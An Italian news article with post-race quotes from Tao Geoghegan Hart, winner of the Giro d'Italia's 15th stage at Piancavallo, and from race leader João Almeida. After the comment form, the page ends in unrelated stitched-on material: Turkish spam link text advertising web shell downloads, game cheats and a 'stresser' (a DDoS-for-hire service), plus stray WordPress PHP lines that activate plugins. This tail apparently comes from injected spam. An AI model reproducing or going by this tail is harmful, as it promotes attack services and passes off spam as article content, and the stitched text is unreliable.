Giro d’Italia, 15ª tappa: le parole di Geoghegan Hart e Almeida


Il vincitore della quindicesima tappa del Giro d’Italia con arrivo a Piancavallo dedica il trionfo al d.s. scomparso quest’anno. Il portoghese, ancora in rosa per 15 secondi: “Vedremo cosa succederà nella prossima settimana”

Il vincitore della quindicesima tappa della corsa rosa con arrivo a Piancavallo, il britannico della Ineos Grenadiers Geoghegan Hart, ha raccontato la sua gioia davanti ai microfoni dopo l’arrivo: “Non ci credo ancora, abbiamo avuto una corsa davvero dura fino ad oggi. Rohan Dennis è stato spettacolare, siamo una grande squadra. Tutti sanno quanto è stato difficile per me il Giro d’Italia, soprattutto lo scorso anno. È stato un anno durissimo per noi, voglio ringraziare il nostro staff e i nostri sponsor. La morte di Nicolas Portal? Voglio dire alla sua famiglia che mi manca moltissimo, nessuno lo può sostituire”.

La maglia rosa

—  

Una giornata difficile per il 22enne portoghese della Deceuninck Quick-Step Joao Almeida, che ha resisitito agli attacchi ed è rimasto leader per soli 15″ : “Oggi è stata una tappa durissima, avevano una velocità altissima davanti, ma sono contento di essere ancora in maglia rosa. Bisogna essere intelligenti dopo due settimane e conoscere bene il proprio corpo. Avrei potuto perdere la maglia rosa per mano di Kelderman, adesso c’è ancora una settimana davanti a noi”.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun Hileleri Oyun Hileleri Stresser

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );